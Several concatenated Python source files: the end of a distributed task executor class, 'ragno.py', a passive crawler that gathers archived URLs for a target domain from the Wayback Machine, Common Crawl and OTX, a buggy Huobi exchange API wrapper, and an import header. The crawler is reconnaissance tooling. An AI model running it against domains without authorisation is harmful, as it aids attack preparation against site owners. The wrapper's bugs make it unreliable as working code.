self.workers_per_node = 1 # our best guess-- we do not have any provider hints
self._task_counter = 0
self.address = address
self.hub_address = None # set to the correct hub address in dfk
self.hub_port = None # set to the correct hub port in dfk
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.interchange_port_range = interchange_port_range
self.heartbeat_threshold = heartbeat_threshold
self.heartbeat_period = heartbeat_period
self.poll_period = poll_period
self.suppress_failure = suppress_failure
self.run_dir = '.'
self.worker_logdir_root = worker_logdir_root
if not launch_cmd:
self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} "
"-p {prefetch_capacity} "
"-c {cores_per_worker} "
"-m {mem_per_worker} "
"--poll {poll_period} "
"--task_url={task_url} "
"--result_url={result_url} "
"--logdir={logdir} "
"--block_id={{block_id}} "
"--hb_period={heartbeat_period} "
"--hb_threshold={heartbeat_threshold} ")
def initialize_scaling(self):
""" Compose the launch command and call the scale_out
This should be implemented in the child classes to take care of
executor specific oddities.
"""
debug_opts = "--debug" if self.worker_debug else ""
max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers)
worker_logdir = "{}/{}".format(self.run_dir, self.label)
if self.worker_logdir_root is not None:
worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label)
l_cmd = self.launch_cmd.format(debug=debug_opts,
prefetch_capacity=self.prefetch_capacity,
task_url=self.worker_task_url,
result_url=self.worker_result_url,
cores_per_worker=self.cores_per_worker,
mem_per_worker=self.mem_per_worker,
max_workers=max_workers,
nodes_per_block=self.provider.nodes_per_block,
heartbeat_period=self.heartbeat_period,
heartbeat_threshold=self.heartbeat_threshold,
poll_period=self.poll_period,
logdir=worker_logdir)
self.launch_cmd = l_cmd
logger.debug("Launch command: {}".format(self.launch_cmd))
self._scaling_enabled = self.provider.scaling_enabled
logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider)
if hasattr(self.provider, 'init_blocks'):
try:
self.scale_out(blocks=self.provider.init_blocks)
except Exception as e:
logger.error("Scaling out failed: {}".format(e))
raise e
def start(self):
"""Create the Interchange process and connect to it.
"""
self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range)
self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range)
self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range)
self.is_alive = True
self._executor_bad_state = threading.Event()
self._executor_exception = None
self._queue_management_thread = None
self._start_queue_management_thread()
self._start_local_queue_process()
logger.debug("Created management thread: {}".format(self._queue_management_thread))
if self.provider:
self.initialize_scaling()
else:
self._scaling_enabled = False
logger.debug("Starting HighThroughputExecutor with no provider")
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
logger.debug("[MTHREAD] queue management worker starting")
while not self._executor_bad_state.is_set():
try:
msgs = self.incoming_q.get(timeout=1)
# logger.debug("[MTHREAD] get has returned {}".format(len(msgs)))
except queue.Empty:
logger.debug("[MTHREAD] queue empty")
# Timed out.
pass
except IOError as e:
logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.exception("[MTHREAD] Caught unknown exception: {}".format(e))
return
else:
if msgs is None:
logger.debug("[MTHREAD] Got None, exiting")
return
else:
for serialized_msg in msgs:
try:
msg = pickle.loads(serialized_msg)
tid = msg['task_id']
except pickle.UnpicklingError:
raise BadMessage("Message received could not be unpickled")
except Exception:
raise BadMessage("Message received does not contain 'task_id' field")
if tid == -1 and 'exception' in msg:
logger.warning("Executor shutting down due to exception from interchange")
self._executor_exception, _ = deserialize_object(msg['exception'])
logger.exception("Exception: {}".format(self._executor_exception))
# Set bad state to prevent new tasks from being submitted
self._executor_bad_state.set()
# We set all current tasks to this exception to make sure that
# this is raised in the main context.
for task in self.tasks:
self.tasks[task].set_exception(self._executor_exception)
break
task_fut = self.tasks[tid]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
try:
s, _ = deserialize_object(msg['exception'])
# s should be a RemoteExceptionWrapper... so we can reraise it
if isinstance(s, RemoteExceptionWrapper):
try:
s.reraise()
except Exception as e:
task_fut.set_exception(e)
elif isinstance(s, Exception):
task_fut.set_exception(s)
else:
raise ValueError("Unknown exception-like type received: {}".format(type(s)))
except Exception as e:
# TODO could be a proper wrapped exception?
task_fut.set_exception(
DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
else:
raise BadMessage("Message received is neither result or exception")
if not self.is_alive:
break
logger.info("[MTHREAD] queue management worker finished")
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_local_queue_process(self):
""" Starts the interchange process locally
Starts the interchange process locally and uses an internal command queue to
get the worker task and result ports that the interchange has bound to.
"""
comm_q = Queue(maxsize=10)
self.queue_proc = Process(target=interchange.starter,
args=(comm_q,),
kwargs={"client_ports": (self.outgoing_q.port,
self.incoming_q.port,
self.command_client.port),
"worker_ports": self.worker_ports,
"worker_port_range": self.worker_port_range,
"hub_address": self.hub_address,
"hub_port": self.hub_port,
"logdir": "{}/{}".format(self.run_dir, self.label),
"suppress_failure": self.suppress_failure,
"heartbeat_threshold": self.heartbeat_threshold,
"poll_period": self.poll_period,
"logging_level": logging.DEBUG if self.worker_debug else logging.INFO
},
)
self.queue_proc.start()
try:
(worker_task_port, worker_result_port) = comm_q.get(block=True, timeout=120)
except queue.Empty:
logger.error("Interchange has not completed initialization in 120s. Aborting")
raise Exception("Interchange failed to start")
self.worker_task_url = "tcp://{}:{}".format(self.address, worker_task_port)
self.worker_result_url = "tcp://{}:{}".format(self.address, worker_result_port)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
if self._queue_management_thread is None:
logger.debug("Starting queue management thread")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
logger.debug("Started queue management thread")
else:
logger.debug("Management thread already exists, returning")
def hold_worker(self, worker_id):
"""Puts a worker on hold, preventing scheduling of additional tasks to it.
This is called "hold" mostly because this only stops scheduling of tasks,
and does not actually kill the worker.
Parameters
----------
worker_id : str
Worker id to be put on hold
"""
c = self.command_client.run("HOLD_WORKER;{}".format(worker_id))
logger.debug("Sent hold request to worker: {}".format(worker_id))
return c
@property
def outstanding(self):
outstanding_c = self.command_client.run("OUTSTANDING_C")
# logger.debug("Got outstanding count: {}".format(outstanding_c))
return outstanding_c
@property
def connected_workers(self):
workers = self.command_client.run("WORKERS")
return workers
@property
def connected_managers(self):
workers = self.command_client.run("MANAGERS")
return workers
def _hold_block(self, block_id):
""" Sends hold command to all managers which are in a specific block
Parameters
----------
block_id : str
Block identifier of the block to be put on hold
"""
managers = self.connected_managers
for manager in managers:
if manager['block_id'] == block_id:
logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager']))
self.hold_worker(manager['manager'])
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
if self._executor_bad_state.is_set():
raise self._executor_exception
self._task_counter += 1
task_id = self._task_counter
# handle people sending blobs gracefully
args_to_print = args
if logger.getEffectiveLevel() >= logging.DEBUG:
args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args])
logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of blocks by "blocks"
Raises:
NotImplementedError
"""
r = []
for i in range(blocks):
if self.provider:
external_block_id = str(len(self.blocks))
launch_cmd = self.launch_cmd.format(block_id=external_block_id)
internal_block = self.provider.submit(launch_cmd, 1)
logger.debug("Launched block {}->{}".format(external_block_id, internal_block))
if not internal_block:
raise(ScalingFailed(self.provider.label,
"Attempts to provision nodes via provider has failed"))
r.extend([external_block_id])
self.blocks[external_block_id] = internal_block
else:
logger.error("No execution provider available")
r = None
return r
def scale_in(self, blocks=None, block_ids=[]):
"""Scale in the number of active blocks by specified amount.
The scale in method here is very rude. It doesn't give the workers
the opportunity to finish current tasks or cleanup. This is tracked
in issue #530
Parameters
----------
blocks : int
Number of blocks to terminate and scale_in by
block_ids : list
List of specific block ids to terminate. Optional
Raises:
NotImplementedError
"""
if block_ids:
block_ids_to_kill = block_ids
else:
block_ids_to_kill = list(self.blocks.keys())[:blocks]
# Hold the block
for block_id in block_ids_to_kill:
self._hold_block(block_id)
# Now kill via provider
to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill]
if self.provider:
r = self.provider.cancel(to_kill)
return r
def status(self):
"""Return status of all blocks."""
status = []
if self.provider:
status = self.provider.status(list(self.blocks.values()))
return status
def shutdown(self, hub=True, targets='all', block=False):
"""Shutdown the executor, including all workers and controllers.
This is not implemented.
Kwargs:
- hub (Bool): Whether the hub should be shutdown, Default:True,
- targets (list of ints| 'all'): List of block id's to kill, Default:'all'
- block (Bool): To block for confirmations or not
Raises:
NotImplementedError
"""
logger.info("Attempting HighThroughputExecutor shutdown")
# self.outgoing_q.close()
# self.incoming_q.close()
self.queue_proc.terminate()
logger.info("Finished HighThroughputExecutor shutdown attempt")
return True
|
ragno.py |
import subprocess
import requests
import argparse
import numpy as np
import threading
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
"""
Crawl Source:
=============
1. web.archive.org
2. index.commoncrawl.org
3. otx.alienvault.com
"""
def get_arguments():
parser = argparse.ArgumentParser(description=f'{RED} Ragno v1.0')
parser._optionals.title = f"{GREEN}Optional Arguments{YELLOW}"
parser.add_argument("-o", "--output", dest="output", help="Save Result in TXT file")
parser.add_argument("-s", "--subs", dest="want_subdomain", help="Include Result of Subdomains", action='store_true')
parser.add_argument("-q", "--quiet", dest="quiet", help="Run Scan Without printing URLs on screen", action='store_true')
parser.add_argument("--deepcrawl", dest="deepcrawl", help=f"Uses All Available APIs of CommonCrawl for Crawling URLs [{WHITE}Takes Time{YELLOW}]", action='store_true')
parser.add_argument("-t", "--thread", dest="thread", help=f"Number of Threads to Used. Default=50 [{WHITE}Use When deepcrawl is Enabled{YELLOW}]", default=50)
required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')
required_arguments.add_argument("-d", "--domain", dest="domain", help="Target Domain Name, ex:- google.com")
return parser.parse_args()
class PassiveCrawl:
def __init__(self, domain, want_subdomain, threadNumber, deepcrawl):
self.domain = domain
self.want_subdomain = want_subdomain #Bool
self.deepcrawl = deepcrawl #Bool
self.threadNumber = threadNumber
self.final_url_list = []
def start(self):
if self.deepcrawl:
self.startDeepCommonCrawl()
else:
self.getCommonCrawlURLs(self.domain, self.want_subdomain, ["http://index.commoncrawl.org/CC-MAIN-2018-22-index"])
urls_list1 = self.getWaybackURLs(self.domain, self.want_subdomain)
urls_list2 = self.getOTX_URLs(self.domain)
# Combining all URLs list
self.final_url_list.extend(urls_list1)
self.final_url_list.extend(urls_list2)
# Removing Duplicate URLs
self.final_url_list = list(dict.fromkeys(self.final_url_list))
return self.final_url_list
def getIdealDomain(self, domainName):
final_domain = domainName.replace("http://", "")
final_domain = final_domain.replace("https://", "")
final_domain = final_domain.replace("/", "")
final_domain = final_domain.replace("www", "")
return final_domain
def split_list(self, list_name, total_part_num):
"""
Takes Python List and Split it into desired no. of sublist
"""
final_list = []
split = np.array_split(list_name, total_part_num)
for array in split:
final_list.append(list(array))
return final_list
def make_GET_Request(self, url, response_type):
response = requests.get(url)
if response_type.lower() == "json":
result = response.json()
else:
result = response.text
return result
def getWaybackURLs(self, domain, want_subdomain):
if want_subdomain == True:
wild_card = "*."
else:
wild_card = ""
url = f"http://web.archive.org/cdx/search/cdx?url={wild_card+domain}/*&output=json&collapse=urlkey&fl=original"
urls_list = self.make_GET_Request(url, "json")
try:
urls_list.pop(0)
except:
pass
final_urls_list = []
for url in urls_list:
final_urls_list.append(url[0])
return final_urls_list
def getOTX_URLs(self, domain):
url = f"https://otx.alienvault.com/api/v1/indicators/hostname/{domain}/url_list"
raw_urls = self.make_GET_Request(url, "json")
urls_list = raw_urls["url_list"]
final_urls_list = []
for url in urls_list:
final_urls_list.append(url["url"])
return final_urls_list
def startDeepCommonCrawl(self):
api_list = self.get_all_api_CommonCrawl()
collection_of_api_list = self.split_list(api_list, int(self.threadNumber))
thread_list = []
for thread_num in range(int(self.threadNumber)):
t = threading.Thread(target=self.getCommonCrawlURLs, args=(self.domain, self.want_subdomain, collection_of_api_list[thread_num],))
thread_list.append(t)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
def get_all_api_CommonCrawl(self):
url = "http://index.commoncrawl.org/collinfo.json"
raw_api = self.make_GET_Request(url, "json")
final_api_list = []
for items in raw_api:
final_api_list.append(items["cdx-api"])
return final_api_list
def getCommonCrawlURLs(self, domain, want_subdomain, apiList):
if want_subdomain == True:
wild_card = "*."
else:
wild_card = ""
final_urls_list = []
for api in apiList:
#url = f"http://index.commoncrawl.org/CC-MAIN-2018-22-index?url={wild_card+domain}/*&fl=url"
url = f"{api}?url={wild_card+domain}/*&fl=url"
raw_urls = self.make_GET_Request(url, "text")
if ("No Captures found for:" not in raw_urls) and ("<title>" not in raw_urls):
urls_list = raw_urls.split("\n")
for url in urls_list:
if url != "":
self.final_url_list.append(url)
if __name__ == '__main__':
arguments = get_arguments()
# Making Instance of PassiveCrawl Class
crawl = PassiveCrawl(arguments.domain, arguments.want_subdomain, arguments.thread, arguments.deepcrawl)
final_url_list = crawl.start()
# If Quiet Mode is Enabled, Save URLs in TXT File, Else Print URLS
if arguments.quiet:
if arguments.output:
with open(arguments.output, "w", encoding="utf-8") as f:
for url in final_url_list:
f.write(url+"\n")
else:
with open(arguments.domain+".txt", "w", encoding="utf-8") as f:
for url in final_url_list:
f.write(url+"\n")
else:
for url in final_url_list:
print(url)
print("[>> Total URLs] : ", len(final_url_list))
if arguments.output:
with open(arguments.output, "w", encoding="utf-8") as f:
for url in final_url_list:
f.write(url+"\n")
|
vnhuobi.py | # encoding: utf-8
import urllib
import hashlib
import gzip
import zlib
import json
import requests
from time import time, sleep
from Queue import Queue, Empty
from threading import Thread
import websocket
# 常量定义
COINTYPE_BTC = 1
COINTYPE_LTC = 2
ACCOUNTTYPE_CNY = 1
ACCOUNTTYPE_USD = 2
LOANTYPE_CNY = 1
LOANTYPE_BTC = 2
LOANTYPE_LTC = 3
LOANTYPE_USD = 4
# MARKETTYPE_CNY = 'cny'
MARKETTYPE_USD = 'usd'
SYMBOL_BTC_USDT = 'btcusdt'
SYMBOL_LTC_USDT = 'ltcusdt'
SYMBOL_BTCUSD = 'BTC_USD'
PERIOD_1MIN = '001'
PERIOD_5MIN = '005'
PERIOD_15MIN = '015'
PERIOD_30MIN = '030'
PERIOD_60MIN = '060'
PERIOD_DAILY = '100'
PERIOD_WEEKLY = '200'
PERIOD_MONTHLY = '300'
PERIOD_ANNUALLY = '400'
# API相关定义
HUOBI_MARKET_API = 'wss://api.huobi.pro/ws'
HUOBI_TRADE_API = 'https://api.huobi.pro/v1'
# 功能代码
FUNCTIONCODE_GETACCOUNTINFO = 'get_account_info'
FUNCTIONCODE_GETORDERS = 'get_orders'
FUNCTIONCODE_ORDERINFO = 'order_info'
FUNCTIONCODE_BUY = 'buy'
FUNCTIONCODE_SELL = 'sell'
FUNCTIONCODE_BUYMARKET = 'buy_market'
FUNCTIONCODE_SELLMARKET = 'sell_market'
FUNCTIONCODE_CANCELORDER = 'cancel_order'
FUNCTIONCODE_GETNEWDEALORDERS = 'get_new_deal_orders'
FUNCTIONCODE_GETORDERIDBYTRADEID = 'get_order_id_by_trade_id'
FUNCTIONCODE_WITHDRAWCOIN = 'withdraw_coin'
FUNCTIONCODE_CANCELWITHDRAWCOIN = 'cancel_withdraw_coin'
FUNCTIONCODE_GETWITHDRAWCOINRESULT = 'get_withdraw_coin_result'
FUNCTIONCODE_TRANSFER = 'transfer'
FUNCTIONCODE_LOAN = 'loan'
FUNCTIONCODE_REPAYMENT = 'repayment'
FUNCTIONCODE_GETLOANAVAILABLE = 'get_loan_available'
FUNCTIONCODE_GETLOANS = 'get_loans'
def signature(params):
"""生成签名"""
params = sorted(params.iteritems(), key=lambda d:d[0], reverse=False)
message = urllib.urlencode(params)
m = hashlib.md5()
m.update(message)
m.digest()
sig=m.hexdigest()
return sig
import logging
logging.basicConfig()
#######################################################################
class HuoBiMarketApi(object):
"""行情接口"""
def readData(self, evt):
"""解压缩推送收到的数据"""
# 创建解压器
decompress = gzip.zlib.decompressobj(16+zlib.MAX_WBITS)
# # 将原始数据解压成字符串
result = decompress.decompress(evt).decode('utf-8') + decompress.flush()
if result[:7] == '{"ping"':
ts = result[8:21]
pong = '{"pong":' + ts + '}'
self.ws.send(pong)
# 通过json解析字符串
data = json.loads(result)
return data
def onMessage(self, ws, evt):
"""信息推送"""
print('onMessage')
data = self.readData(evt)
print(data)
def onError(self, ws, evt):
"""错误推送"""
print('onError')
print(evt)
def onClose(self, ws):
"""接口断开"""
print('onClose')
def onOpen(self, ws):
"""接口打开"""
print('onOpen')
def connect(self, trace=False):
"""连接服务器"""
self.ws = websocket.WebSocketApp(HUOBI_MARKET_API,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever)
self.thread.start()
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
def sendMarketDataRequest(self, req):
try:
self.ws.send(req)
except websocket.WebSocketConnectionClosedException:
pass
def subscribeTick(self, symbol):
"""订阅实时成交数据"""
self.sendMarketDataRequest('{"req": "market.%s.detail", "id": "id12"}' % symbol)
def subscribeQuote(self, symbol):
"""订阅实时报价数据"""
url = self.QUOTE_SYMBOL_URL[symbol]
task = (url, self.onQuote)
self.taskList.append(task)
def subscribeDepth(self, symbol, level=0):
"""订阅深度数据"""
self.sendMarketDataRequest('{"req": "market.{0}.depth.step0", "id": "id1"}'.format(symbol))
def subscribeKLine(self, symbol):
"""订阅实时成交数据"""
self.sendMarketDataRequest('{"req": "market.%s.kline.1min", "id": "id2"}' % symbol)
# def subscribeQuote(self, symbol):
# """订阅实时报价数据"""
# url = self.QUOTE_SYMBOL_URL[symbol]
# task = (url, self.onQuote)
# self.taskList.append(task)
def subscribeDepth(self, symbol, level=0):
"""订阅深度数据"""
self.sendMarketDataRequest('{"req": "market.{0}.depth.step0", "id": "id1"}'.format(symbol))
########################################################################
class TradeApi(object):
"""交易接口"""
DEBUG = True
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.accessKey = ''
self.secretKey = ''
self.active = False # API工作状态
self.reqID = 0 # 请求编号
self.reqQueue = Queue() # 请求队列
self.reqThread = Thread(target=self.processQueue) # 请求处理线程
#----------------------------------------------------------------------
def processRequest(self, req):
"""处理请求"""
# 读取方法和参数
method = req['method']
params = req['params']
optional = req['optional']
# 在参数中增加必须的字段
params['created'] = long(time())
params['access_key'] = self.accessKey
params['secret_key'] = self.secretKey
params['method'] = method
# 添加签名
sign = signature(params)
params['sign'] = sign
del params['secret_key']
# 添加选填参数
if optional:
params.update(optional)
# 发送请求
payload = urllib.urlencode(params)
r = requests.post(HUOBI_TRADE_API, params=payload)
if r.status_code == 200:
data = r.json()
return data
else:
return None
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
req = self.reqQueue.get(block=True, timeout=1) # 获取请求的阻塞为一秒
callback = req['callback']
reqID = req['reqID']
data = self.processRequest(req)
# 请求失败
if 'code' in data and 'message' in data:
error = u'错误信息:%s' %data['message']
self.onError(error, req, reqID)
# 请求成功
else:
if self.DEBUG:
print(callback.__name__)
callback(data, req, reqID)
except Empty:
pass
#----------------------------------------------------------------------
def sendRequest(self, method, params, callback, optional=None):
"""发送请求"""
# 请求编号加1
self.reqID += 1
# 生成请求字典并放入队列中
req = {}
req['method'] = method
req['params'] = params
req['callback'] = callback
req['optional'] = optional
req['reqID'] = self.reqID
self.reqQueue.put(req)
# 返回请求编号
return self.reqID
####################################################
## 主动函数
####################################################
#----------------------------------------------------------------------
def init(self, accessKey, secretKey):
"""初始化"""
self.accessKey = accessKey
self.secretKey = secretKey
self.active = True
self.reqThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
#----------------------------------------------------------------------
def getAccountInfo(self, market='cny'):
"""查询账户"""
method = FUNCTIONCODE_GETACCOUNTINFO
params = {}
callback = self.onGetAccountInfo
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getOrders(self, coinType=COINTYPE_BTC, market='cny'):
"""查询委托"""
method = FUNCTIONCODE_GETORDERS
params = {'coin_type': coinType}
callback = self.onGetOrders
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def orderInfo(self, id_, coinType=COINTYPE_BTC, market='cny'):
"""获取委托详情"""
method = FUNCTIONCODE_ORDERINFO
params = {
'coin_type': coinType,
'id': id_
}
callback = self.onOrderInfo
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def buy(self, price, amount, coinType=COINTYPE_BTC,
tradePassword='', tradeId = '', market='cny'):
"""委托买入"""
method = FUNCTIONCODE_BUY
params = {
'coin_type': coinType,
'price': price,
'amount': amount
}
callback = self.onBuy
optional = {
'trade_password': tradePassword,
'trade_id': tradeId,
'market': market
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def sell(self, price, amount, coinType=COINTYPE_BTC,
tradePassword='', tradeId = '', market='cny'):
"""委托卖出"""
method = FUNCTIONCODE_SELL
params = {
'coin_type': coinType,
'price': price,
'amount': amount
}
callback = self.onSell
optional = {
'trade_password': tradePassword,
'trade_id': tradeId,
'market': market
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def buyMarket(self, amount, coinType=COINTYPE_BTC,
tradePassword='', tradeId = '', market='cny'):
"""市价买入"""
method = FUNCTIONCODE_BUYMARKET
params = {
'coin_type': coinType,
'amount': amount
}
callback = self.onBuyMarket
optional = {
'trade_password': tradePassword,
'trade_id': tradeId,
'market': market
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def sellMarket(self, amount, coinType=COINTYPE_BTC,
tradePassword='', tradeId = '', market='cny'):
"""市价卖出"""
method = FUNCTIONCODE_SELLMARKET
params = {
'coin_type': coinType,
'amount': amount
}
callback = self.onSellMarket
optional = {
'trade_password': tradePassword,
'trade_id': tradeId,
'market': market
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def cancelOrder(self, id_, coinType=COINTYPE_BTC, market='cny'):
"""撤销委托"""
method = FUNCTIONCODE_CANCELORDER
params = {
'coin_type': coinType,
'id': id_
}
callback = self.onCancelOrder
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getNewDealOrders(self, market='cny'):
"""查询最新10条成交"""
method = FUNCTIONCODE_GETNEWDEALORDERS
params = {}
callback = self.onGetNewDealOrders
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getOrderIdByTradeId(self, tradeId, coinType=COINTYPE_BTC,
market='cny'):
"""通过成交编号查询委托编号"""
method = FUNCTIONCODE_GETORDERIDBYTRADEID
params = {
'coin_type': coinType,
'trade_id': tradeId
}
callback = self.onGetOrderIdByTradeId
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def withdrawCoin(self, withdrawAddress, withdrawAmount,
coinType=COINTYPE_BTC, tradePassword='',
market='cny', withdrawFee=0.0001):
"""提币"""
method = FUNCTIONCODE_WITHDRAWCOIN
params = {
'coin_type': coinType,
'withdraw_address': withdrawAddress,
'withdraw_amount': withdrawAmount
}
callback = self.onWithdrawCoin
optional = {
'market': market,
'withdraw_fee': withdrawFee
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def cancelWithdrawCoin(self, id_, market='cny'):
"""取消提币"""
method = FUNCTIONCODE_CANCELWITHDRAWCOIN
params = {'withdraw_coin_id': id_}
callback = self.onCancelWithdrawCoin
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def onGetWithdrawCoinResult(self, id_, market='cny'):
"""查询提币结果"""
method = FUNCTIONCODE_GETWITHDRAWCOINRESULT
params = {'withdraw_coin_id': id_}
callback = self.onGetWithdrawCoinResult
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def transfer(self, amountFrom, amountTo, amount,
coinType=COINTYPE_BTC ):
"""账户内转账"""
method = FUNCTIONCODE_TRANSFER
params = {
'amount_from': amountFrom,
'amount_to': amountTo,
'amount': amount,
'coin_type': coinType
}
callback = self.onTransfer
optional = {}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def loan(self, amount, loan_type=LOANTYPE_CNY,
market='MARKETTYPE_CNY'):
"""申请杠杆"""
method = FUNCTIONCODE_LOAN
params = {
'amount': amount,
'loan_type': loan_type
}
callback = self.onLoan
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def repayment(self, id_, amount, repayAll=0,
market='MARKETTYPE_CNY'):
"""归还杠杆"""
method = FUNCTIONCODE_REPAYMENT
params = {
'loan_id': id_,
'amount': amount
}
callback = self.onRepayment
optional = {
'repay_all': repayAll,
'market': market
}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getLoanAvailable(self, market='cny'):
"""查询杠杆额度"""
method = FUNCTIONCODE_GETLOANAVAILABLE
params = {}
callback = self.onLoanAvailable
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
#----------------------------------------------------------------------
def getLoans(self, market='cny'):
"""查询杠杆列表"""
method = FUNCTIONCODE_GETLOANS
params = {}
callback = self.onGetLoans
optional = {'market': market}
return self.sendRequest(method, params, callback, optional)
####################################################
## 回调函数
####################################################
#----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print(error, reqID )
#----------------------------------------------------------------------
def onGetAccountInfo(self, data, req, reqID):
"""查询账户回调"""
print(data)
#----------------------------------------------------------------------
def onGetOrders(self, data, req, reqID, fuck):
"""查询委托回调"""
print(data)
#----------------------------------------------------------------------
def onOrderInfo(self, data, req, reqID):
"""委托详情回调"""
print(data)
#----------------------------------------------------------------------
def onBuy(self, data, req, reqID):
"""买入回调"""
print(data)
#----------------------------------------------------------------------
def onSell(self, data, req, reqID):
"""卖出回调"""
print(data)
#----------------------------------------------------------------------
def onBuyMarket(self, data, req, reqID):
"""市价买入回调"""
print(data)
#----------------------------------------------------------------------
def onSellMarket(self, data, req, reqID):
"""市价卖出回调"""
print(data)
#----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回调"""
print(data)
#----------------------------------------------------------------------
def onGetNewDealOrders(self, data, req, reqID):
"""查询最新成交回调"""
print(data)
#----------------------------------------------------------------------
def onGetOrderIdByTradeId(self, data, req, reqID):
"""通过成交编号查询委托编号回调"""
print(data)
#----------------------------------------------------------------------
def onWithdrawCoin(self, data, req, reqID):
"""提币回调"""
print(data)
#----------------------------------------------------------------------
def onCancelWithdrawCoin(self, data, req, reqID):
"""取消提币回调"""
print(data)
#----------------------------------------------------------------------
def onGetWithdrawCoinResult(self, data, req, reqID):
"""查询提币结果回调"""
print(data)
#----------------------------------------------------------------------
def onTransfer(self, data, req, reqID):
"""转账回调"""
print(data)
#----------------------------------------------------------------------
def onLoan(self, data, req, reqID):
"""申请杠杆回调"""
print(data)
#----------------------------------------------------------------------
def onRepayment(self, data, req, reqID):
"""归还杠杆回调"""
print(data)
#----------------------------------------------------------------------
def onLoanAvailable(self, data, req, reqID):
"""查询杠杆额度回调"""
print(data)
#----------------------------------------------------------------------
def onGetLoans(self, data, req, reqID):
"""查询杠杆列表"""
print(data)
# |
analyse_terms.py | #########################################################################################################################################
# IMPORTS ###############################################################################################################################
from collections import Counter
import os,sys
import re, regex
import csv
import itertools
import functools
import operator
from copy import deepcopy as copy
import sqlite3
import numpy as np
from scipy.sparse import csr_matrix as csr
from scipy.sparse.csgraph import connected_components
from langdetect import detect
import multiprocessing as MP
import time
import math
#########################################################################################################################################
# GLOBAL OBJECTS ########################################################################################################################
